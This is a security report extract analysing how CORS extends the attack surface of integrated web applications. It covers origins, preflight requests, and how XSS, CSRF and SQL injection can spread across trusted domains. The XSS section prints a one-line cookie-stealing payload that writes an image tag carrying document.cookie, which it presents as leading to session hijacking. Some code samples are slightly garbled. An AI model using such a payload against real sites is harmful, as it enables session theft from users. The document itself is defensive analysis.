CORS and well-known vulnerabilities

This article is a modified version of an extract from:

Please note that this assessment was not made to evaluate conventional uses of CORS, but only its applicability for building systems that collaborate with each other through CORS, forming a complex ecosystem.


In order to better evaluate our use of CORS, we conducted an initial research about the protocol itself, gathering the most relevant facts that would guide our analysis into a non-conventional approach for studying cyber-security issues in web applications. This chapter is divided in two major sections: Protocol Analysis and System analysis. While the former discuss relevant topics and guidelines for evaluating the use of CORS in a generalized point of view, the latter exhibits our analysis of how CORS was applied in our system.

Protocol Analysis


As part of this project, we sought to analyze the contents presented by the Cross-Origin Resource Sharing W3C Recommendation (16 January 2014) [12] with the objective of compiling the main aspects with potential to open vulnerabilities in complex web applications. We studied the specification and compared the protocol’s behavior with the patterns exhibited by the most frequent web application vulnerabilities. This document gathers our findings, demonstrating both that threats may come from diverse sources and that the lack of material directly connecting CORS to old and well-known vulnerabilities may cause a false sense of security. We conclude our work with the strong assertion that trust, within the context of that recommendation, means an effective transfer of responsibility for security issues, from the original application to its clients.

The W3C Recommendation [12] subject to this assessment offers an incredible flexibility to build complex and efficient web applications by extending the capabilities of the well known AJAX techniques. However, it greatly increases the attack surface in composed interactive systems, demanding further investigation.

This assessment shows that new security concerns have emerged, but we sought to highlight the fact that old and well-known vulnerabilities can easily emerge within a project, as our sources discuss the emergent needs but fail to acknowledge the means by which old threads can be unearthed due to the association of web systems. Misconfiguration was seen as the biggest probable problem along with the lack of comprehensive material to demonstrate the connections between these new specifications and old problems, fact that aggravates what might be seen as resolved. We addressed in this material: XSS, CSRF, and SQL-injection vulnerabilities.

Our findings indicate that vulnerabilities exploitable by targeting client side technologies in an application issuing CORS requests will lead to vulnerabilities in the original system, even if it has been hardened by conventional techniques to resist against such types of attack. This is due to the simple fact that one can use the vulnerable system to convey malicious data, targeting an embedded document; for instance, through XSS and CSRF. However, attacks where the data has to cross the original application’s trust boundaries, passing through conventional defenses are as effective as direct attacks. Due to those facts, we want to highlight the importance of recognizing that a system will have its security level lowered to the lowest level of all applications that include their contents into an aggregated document when facing the assessed vulnerabilities; thus, allowing other domains to use an application as a part of a bigger project is effectively a responsibility transfer.

This study was motivated by the fact that our system uses CORS to include elements from SS in most applications within the TrueNTH initiative, preserving important elements while considering their desirable appearance and behavior.

Cross-Origin Resource Sharing definition

Cross-Origin Resource Sharing is a relatively recent technology that has been developed in the past few years and it finally made its way to achieve the status of a W3C Recommendation in 2014. That document shows the maturity attained and how it pursued to fulfill a major need brought about by web developers: the necessity of integration.

Users, in their need for more integrated technologies and desire for more complex functionalities, for a long time have been demanding the use of data originated from multiple domains. This desire reflected on engineers, who have developed creative ways of requesting and handling information originated in domains out of their control. Moreover, AJAX raised the bar since it became a ubiquitous strategy for dynamically requesting data from client applications to use it on the fly.

All those needs were addressed by the W3C recommendation, which made possible to request for foreign content through AJAX requests, as before CORS, security restrictions imposed by all major browsers would forbid this kind of actions.

Finally, CORS is a mechanism to enable client-side cross-origin requests [12]. In summary, it allows requests to be identified by their origin, while the server-side application is able to verify security restrictions, informing the browser if a request is permitted.


Some interesting data is shown by TECHWARS when requesting the tool to compare CORS with other technologies with similar purposes. We could see that the community support for CORS is shown as significantly lower when comparing Stack Overflow questions, without discriminating security related issues [23]. This could be a reflection of a lack of support and adoption. A possibility that supports our beliefs that more information is necessary.

In our research, we noticed the lack of references helping developers to analyze and use CORS in a secure manner and the scarcity of comprehensive material connecting CORS to well-known vulnerabilities. Reliable sources, such as the OWASP, fail to address, holistically, CORS in all levels of a web application in a systematic approach, which may lead developers to a false sense of security. Furthermore, the lack of explicit material dealing with old threats may cause developers to rely on conventional defenses, reinforcing an unjustifiable feeling of safety. Moreover, several are the sources indicating problems, including well grounded documents such as RFCs, commenting on particular issues; however, engineers need to go throughout multiple and numerous sources, studying issues across an immense set of unreliable or obscure information.

In this report, we also focused on the implications one have to analyze when studying the possibility of using CORS to grant other domains access to a resource. Additionally, we sought to reinforce OWASP recommendations to the general public and extend them in a easy to implement fashion, to ensure CORS is well understood and safely used. Finally, we will also discuss language problems that might cause issues.


According to W3C, CORS is a mechanism to enable client-side cross-origin requests. This means that this protocol was developed to allow foreign applications to request resources from other domains.

While this capability was in fact around for many years, for simple elements, such as images, ECMAScript (JavaScript) code was not allowed to make such requests, mainly due to the same-origin security policy, implemented by all major browsers.

JavaScript provides developers with powerful tools to manipulate the Document Object Model (DOM) and events associated with the elements presented within the page, triggering functions and permitting the development of truly interactive client-side applications. However, those capabilities have been being explored by malicious developers and users (threat agents) to perform attacks in creative ways.

Via AJAX, programmers can create and personalize requests towards targeted resources, a capability especially dangerous, in the wrong hands, if cross-site requests were allowed. If a browser permitted this type of request, malicious pages would be able to create tailored HTTP requests, using data available on the client-side and reading data coming from the server-side for nefarious usages. For instance, if a user visited and this page was able to issue requests to, the user would be extremely vulnerable, possibly losing money through unsolicited transfers. In summary, Cross-domain AJAX requests were not allowed due to their ability to perform requests with malicious data, tailored headers and non-idempotent request sequences [24] to read and manipulate data, among other capabilities that would introduce many security issues. Therefore, this was not permitted under the same-origin security policy.


Before explaining the mechanisms behind CORS, we need to understand what an “origin” is, as it is one of the key concepts in CORS. The RFC 6454 is one of the best documents to obtain a complete understanding of how CORS and the same-origin security policy work. The following quote was extracted from that document and it defines “origin” as it is seen by browsers (an example of user-agents).

“...user-agents group URIs together into protection domains called “origins”. Roughly speaking, two URIs are part of the same origin (i.e., represent the same principal) if they have the same scheme, host, and port...” [25]

The RFC also deserves special consideration for its discussion about origin, particularly, around the idea of the existence of “benign web sites” and “malicious web sites” as it discuss and give examples as the following.

“...the user-agent implementor [sic] might wish to prevent scripts retrieved from a malicious server from reading documents stored on an honest server, which might, for example, be behind a firewall...” [25]

This interpretation opens space to neglect the central theme of our studies: the extended attack surface caused by CORS. In this context, it is essential to define trust and its meaning to perform assessments and deal with threats. By using the view in which malicious and benign servers are separated as exposed, an inattentive developer might be distracted from the existence of benign but vulnerable systems, which can be used as threat vectors. This could lead to a misplaced trust and an erroneous interpretation of what trust actually means with the new capabilities provided by CORS.


Cross-Origin Resource Sharing (CORS) is also the W3C recommendation that defines how user-agents and server-applications should proceed when facing requests that come from different origins. Basically, it stipulates a communication protocol that allows the involved parties to gather enough information about each other in order to evaluate if a request is valid and if access can be granted, determining if request should succeed or fail [26]. Thus, it can be seen as a handshake protocol, without going further on security merits. This section exhibits the basics about this protocol in order to discuss security issues later, the reader interested on implementing CORS in client-side applications is encouraged to read [27] [28] and [29], while for server-side applications, an overview can be found on [30]. Additionally, important security considerations, including testing methodologies, can be found on [14] [15] and [13].

CORS extends the traditional security model, normally enforced by user-agents. In the conventional model, limitations prevent client-side Web applications running in one origin from obtaining data and submitting requests to another origin, including unsafe HTTP requests that can be automatically launched towards alien sites [12]. In CORS, this model is extended by allowing the server-application to verify requests’ origins, by adding specific headers to allow the user-agent to verify the policies enforced by the server and including mechanisms to make queries before sending “complex requests”. CORS adds the Origin header in all CORS requests in order to inform the serve-side application with data about where the requests are coming from. For instance, in a HTTP request, one should expect to see the origin represented as in the following example.

Origin :

When the serve receives such information, it can take the necessary actions and issue a response with the requested resource or send informative data when handling queries, more in section 6.2.3. When trying to inform the browser of an allowed domain, it should use an Access-Control-Allow-Origin header, like the following example.

Access−Control−Allow−Origin :

Alternatively, the following can be used to permit requests coming from any domain.

Access−Control−Allow−Origin : ∗

Those simple headers allow the user-agents to communicate effectively with the server, while the latter can verify its own security policies before issuing a response, if any is to be sent. Following the example given by Mozilla [28], we can see how a simple JavaScript code could issue such kind of request.

var invocation = new XMLHttpRequest( ) ;
var url = ’http://bar.other/resources/public−data/ ’ ;

function callOtherDomain ( ) {
    i f ( invocation ) {
   ’GET’, url , true ) ;
        invocation.onreadystatechange = handler ;
        invocation.send( ) ;

As we can see, the programmer does not have to define any special instruction, besides programing a regular AJAX request; all the details are managed by the user-agent and the server-side application. This code would generate the following request, for instance.

GET /resources/public-data/ HTTP/1.1
Host: bar.other
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X
10.5; en-US; rv:1.9.1b3pre) Gecko/20081130
Accept:	text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://foo.example/examples/access-control/simpleXSInvocation.html
Origin: http://foo.example

This request is a cross-site request, requiring a resource from bar.other to be used in an application from foo.example. A response coming from this server could look like the following example, which approves any domain.

HTTP/1.1 200 OK
Date: Mon, 01 Dec 2008 00:23:53 GMT
Server: Apache/2.0.61
Access-Control-Allow-Origin: \*
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/xml

Security notes on origins

Developers should be aware of the resources' nature when configuring access through CORS. When analyzing the possible values for the Access-Control-Allow-Origin header, the resources need to pass through an evaluation in order to verify if they are actually eligible to become a publicly available or partially restricted artifact.

In the non-normative security considerations section of the W3C recommendation [12], we can find excellent guidelines for this judgment process. In summary, it recommends not returning the header if the resource is not useful for other domains, and only use the "*'' wildcard if the resource is truly public and if it does not contain sensitive data. Additionally, it argues that using the header in combination with the wildcard can be better advocated if the resource can be translated into a publicly available artifact accessible via simple tags and GET requests, idempotent operations. We recommend going through this section of that document when judging the use of CORS. 

Although it is easy to find recommendations about the matter on reliable sources [12] [14], we would like to add a topic to think about when evaluating the use of CORS in
complex architectures and in any application system in strongly regulated domains. One of the goals of this report is to discuss CORS in complex and strongly integrated systems, normally desired on enterprise level initiatives. Such argumentation is applied to base our usage of CORS in this project, especially, to evaluate the safeness of the use case where an alien component is involved in our authentication process.

We want to make clear that CORS is safe to use, but it requires extra care when designing systems and discussing agreements with partners. In our argumentation, we present CORS as a technique that will increase the attack surface when dealing with more interactive applications. With that in mind, one can see that part of our system will be running in a foreign domain, possibly out of our control. This fact represents a huge risk, if services and responsibilities are not well defined among the involved parties. Some of the evaluated vulnerabilities are just out of our control when CORS is used and defining who is liable when a security breach occurs is essential in some fields, especially if data breach is a consequence.

For instance, if two health related applications are running on varied origins, possibly different domains, sharing resources through CORS and one of them was vulnerable to a XSS exploitation, leading to a security breach on the second one, it should be clear in contracts, or other legal means, who is responsible. The same is true for many regulated domains, and any system that deals with personal identifiable information (PII), for that matter. Defining liability and responsibilities is essential, including within terms of use documents. If an organization is not able to define the risks clearly in sensitive domains or reach an agreement with a particular partner, CORS should be avoided. In summary, "origin'" fields represent an explicit permission and we argue that by granting it, there is a transfer of responsibility to a partner and all risks associated with this fact should be evaluated.

Preflighted requests

CORS is an extremely flexible technology and it allows applications to inform user-agents how to manage cache, origins, and even credentials. However, for the purposes of this report, we focused on its main functionality and its semantics in order to understand our arguments in a high-level discussion. We finalize the CORS section by explaining preflighted requests while further details will be discussed as they become necessary in the following sections.

CORS defines what it understands as “simple” requests and it differentiates this group from the ones that requires an initial query, preflight, before sending the server a real HTTP request; asking permission before acting. The request is simple if it uses simple methods and headers. Simple methods (case-sensitive) are HEAD, GET and POST. While simple headers (case-insensitive) are Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma. Additionally, the recommendation states that "A header is said to be a simple header if the header field name is an ASCII case-insensitive match for Accept, Accept-Language, or Content-Language or if it is an ASCII case-insensitive match for Content-Type and the header field value media type (excluding parameters) is an ASCII case-insensitive match for application/x-www-form-urlencoded, multipart/form-data, or text/plain."[12]

Figure 6.1: CORS flow


What this means it that the technology is able to see when abnormal and possibly dangerous requests are being used (not in the security sense, but just on what it expects to be usual, as in other cases it is better ask if the server is able to handle uncommon requests). For instance, an application could use custom headers, which is perfectly normal, but it is better to verify with the server if it is able to handle the requests. The user-agent sends a query, via an HTTP OPTIONS request, which will contain information explaining the characteristics of the original request, what headers it wants to use, via which method and what is the origin. The server-side application will evaluate the request and send what headers it can accept, which methods and from where. Additionally, it can inform the user-agent about cache policies and if the response will vary for different origins or if credentials are allowed. Figure 6.1 demonstrates the process’ flow.

Security notes about preflighting

The protocol is clear on how to request information from web servers; however, there is no guarantee that all user-agents will correctly follow the recommendation or even attempt to comply with it. Additionally, there are old user-agents that are able to issue conventional requests, allowing cross-site requests, but not following the recommendation. Furthermore, there is malicious code around, which might try to spoof information. For these reasons, the serve-side application is ultimately responsible for enforcing its security policies for every resource. Additionally, in no circumstance the origin should be used in security controls as the only authentication/security mechanism, if they are judged to be necessary.

A reliable set of recommendations on that matter is given by the HTML5 Security Cheat Sheet [13]. There, one can find security concerns that were ignored by most development dedicated pages, including the recommendation itself [12] and Mozilla’s article on CORS [28]. Additionally, it is important to highlight the need for protection for simple requests, not preflighted, as mentioned in that document, but also for any type of request to verify if the user-agent is indeed following the rules.

Finally, the recommendations found in CORS Origin Header Scrutiny [14] reinforce several of those guidelines previously made, including IP-caching to avoid attackers from using brute-force to guess legal parameters. The document also illustrated the use of a Java EE filters to enforce its IP cache control, what also suggests the use of filters as a good way to enforce security controls, individually or in groups. By using filters, the development team has a way to separate the security controls from the business logic with increased freedom to verify security restrictions programmatically, including white-listing and personalized policies for different domains.

Target vulnerabilities

In the section, we explain the most common web vulnerabilities that fed our concerns and inspired the development of this report. We will discuss XSS, CSRF and SQL-injections.

Although, we recognized that this is just a really small subset of all vulnerabilities that can emerge in web applications, we intended to highlight the most common vulnerabilities, which are also easily exploitable and can be neglected by developers used to traditional countermeasures. Therefore, we pursued to unearth well-known vulnerabilities that would be aggravated by an increased attack surface brought about by CORS. It should be clear that through this section we sought to discuss how the attack surface was enlarged and why conventional countermeasures fail. Misconfiguration has been addressed when necessary, but dedicated sections were written to discuss the matter further in most of the security related documents we used as reference.

XSS: Cross-site scripting

“The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.”[31]

One of the most common weakness, falling in neutralizing malicious input that might lead the client-site application to execute instructions out of its purpose, also referred to as Cross-site scripting (XSS), a vulnerability normally found in web applications. It is present whenever an application permits the injection of malicious data into victims’ web client-site application. Normally, it is exploited by the injection of malicious code into the client’s browser session, which will be interpreted by the user-agent in order to accomplish the attackers’ objectives. This attack is especially dangerous because the actions triggered by the malicious code run under the same domain policy, enforced by the user-agent.

This means that the client is unable to distinguish between legit or malicious code; thus, the browser will act as if the code was indeed part of the application. On the other side, the server will see any request made as legit and will act on it as any regular request.

The quote, extracted from MITRE’s Common Weakness Enumeration, under the CWE-79 entry (Improper Neutralization of Input During Web Page Generation), basically, describes all classified types of XSS. This definition points to the fact that the weakness is caused by the possibility of an attacker being able to provide data to an input entrance point, without proper defenses, leading to such data being used to generate content for legit users, dynamically.

Figure 6.2: XSS type 2 - Infection


The diagram, depicted in the figure 6.2, describes a type-2 XSS attack, where a malicious user sends data to the web application. Without proper defenses, the data is stored in the database and used in the future to generate content for legit users. In the diagram, we can see that the attacker used a data entrance point to store a malicious piece of information into the database, via some flaw found in the server application. Later, legit users requesting content that triggers the use of this data to dynamically generate responses will receive the attacker’s data, as illustrated by the figure 6.3.

Although it might seem as improbable, this sort of attack is in reality a common technique, which is easy to exploit and flaws can be found with automated tools, requiring little knowledge to succeed.

Figure 6.3: XSS type 2 - Exploitation


In order to demonstrate the simplicity of this attack, the following paragraphs will discuss a simple example extracted from a XSS SEED lab [32], where the system was purposely made vulnerable in order to present an attack that is extremely effective along with a simple vulnerability that would allow small worms to propagate.

Figure 6.4: XSS type 2 - Infection example


As the figure 6.4 illustrates, the code was injected (simply typed) in a form used to modify the user’s profile. The figure depicts a small JavaScript code used to create a pup-up message. With a simple text editor, one could have created this code and saved in their main profile page. After performing this attack, anyone visiting this person’s profile would see a pop-up, as exemplified by figure 6.5. Off course, a malicious user would code more harmful instructions, such as sending cookies to a remote server or performing unauthorized transactions while using the current user’s session. The next example shows how a cookie can be sent to a remote server by simply adding an image tag into the page, which can lead to session hijacking.

document.write('<img src='+escape(document.cookie)+'>')

To protect against such dangerous attack, traditionally, developers have used encoding and white-listing techniques, which would avoid input data to be interpreted as code or even reach the storage location. There are several ways to protect against this attack, but they are normally seen on server-side applications, because client-side protection can be easily bypassed – although, client side mechanisms should help on reducing the server load, by acknowledging the user about invalid formats and speeding up feedbacks, among others non-security related objectives.

Figure 6.5: XSS type 2 - Exploitation example


As we can see on figure 6.6, an application can be protected to avoid malicious data, or at least to use a cleaner version of it.

Figure 6.6: XSS type 2 - Protected system


However, when we grant access to a resource through CORS, the attacker does not have only one target application, but every application used to build the integrated system turns into a target, possible able to convey malicious data that can be tailored to affect any of the participant subsystems.

That is why we seek to highlight that the attack surface was extended and conventional defenses are not applicable. Figure 6.7 illustrates this new scenario in a diagram. Whenever an attacker cannot inject code directly into the application’s database, for instance, they might be able to choose a second target to convey its code. In the diagram, a complex and integrated application is accessed by the user, who receives a response and executes several requests to foreign domains in order to group data from different locations and assemble the desired content. For instance, if an application was to exhibit a brief description field of our infected profile when the user makes a comment in a second application, the code would be executed inside a program that was not our original and vulnerable one.

Figure 6.7: XSS type 2 - XSS through CORS


We need to realize that CORS will manage resources like AJAX used to do and the content delivered to the client application will be formed by mixing data while interacting with multiple domains in a transparent manner. What this effectively means is that a worm propagating itself through one application can actually carry code to affect a second system, using the first one just as a delivery mechanism. Additionally, by looking on how XSS works, it should be noticed that there are not many options for a domain to protect itself should access be granted to a vulnerable domain.

Due to this new behavior, in addition the test recommendations made by OWASP [15], we strongly recommend to test every client domain for XSS problems. Several sources indicate that CORS should have a limited use, but the potential to build flexible and integrated systems, distributed across providers, should not be ignored. We analyzed this use specifically to stimulate its usage to build complex systems. Nevertheless, the architecture needs to be well planned and supervised by a security professional. Additionally, it should be understood that the global architecture will involve several parts and a clear understanding about liability and responsibilities must be stipulated. In complex architectures, possibly with highly specific security requirements, a security shell can be used to manage access, filters, and a database with policies to help the shell to dynamically evaluate each request and manage cache. Simple filters can be used for smaller applications. A written policy with requirements for allowing new origins may be necessary while the system grows. Google Maps, for example, will not allow CORS as it may lead to a policy violation, off-line use of data, as CORS does not support such control [30].

CSRF: Cross-Site Request Forgery

In this section, we briefly discuss CSRF, mainly because the problem is well documented, recommendations can be found in OWASP [13] and included in the W3C recommendation. Furthermore, the defenses are still the same as traditionally done while the concerns caused by CORS can be easily understood by analogy with the arguments presented in the last section and the common weaknesses that normally leads to it are well documented by the definition found in MITRE’s enumeration.

“The web application does not, or cannot, sufficiently verify whether a wellformed, valid, consistent request was intentionally provided by the user who submitted the request.” [33]

CSRF or XSRF stands for cross-site request forgery, which, normally, is a type of attack where a victim is in a session within a trusted web application, or they hold enough information to create one, and they visit an infected web page that will exploit this session/data for undesired purposes. The malicious code creates an HTTP request directed to the trusted site into the victim’s session, leading to collateral effects. Generalizing, it is the use of any request a web-application cannot identify as legit, as reflection of the user’s intentions, or as a forgery emerged from an illicit source, normally, a malicious alien domain.

In addition to the simple exploitation of the presented weakness, for the purposes of this report, a fact that called our attention was that most CSRF countermeasures can be bypassed through XSS, as JavaScript can read through the elements of a response/page, it can locate and take advantage of tokens normally used as countermeasures. Possibly, it can also send it to a remote server for hijacking or for invoking a malicious page with the information, performing a hybrid XSS-CSRF attack.


SQL-injection is used here to illustrate a different kind of vulnerability, present on server side applications. We sought to contrast this situation with the previous ones, where the vulnerabilities were located on client-side applications. Here, we abuse the terminology to indicate the exploitation point rather than indicating the vulnerability location. Additionally, we try to convey the idea of multiple origins, where one origin can generate data for client-side applications with exploits for the second one.

SQL-Injections are performed by sending malicious data in order to affect database operations. What this means is that the data, necessarily, has to cross trust boundaries, eventually, passing through server-side protections. If the server is well protected against this type of attack, nothing needs to be done apart from for the traditional countermeasures.

However, it is easy to identify problems if one of the partners is vulnerable as described before. For instance, it is likely that partners hold sensitive information about our system in their database, or just general information about us. If our partner is compromised, all this information is vulnerable. Furthermore, if the database is compromised and information in it is used to generate content for users, we are again vulnerable to XSS and XSRF in hybrid and multilevel attacks. Additionally, this corruption could lead to extra damage if the content is used by our system, including invalid data that can scale to DoS issues.


Our assessment on CORS technology shows that it has a high potential to simplify how we build complex applications. It is able to increase integration and bring enterprise level systems to a new level, allowing the use of distributed sources of content in a transparent and easy to implement manner. However, the extended attack surface it generates can be hard to manage and a cautious evaluation is required, including with partners. Security is put in risk if it is not well managed and policies are not respected. Furthermore, using CORS is a decision that will lead to a responsibility transfer; thus, it should not be a pure engineering decision but it should require management approval.

Most Recent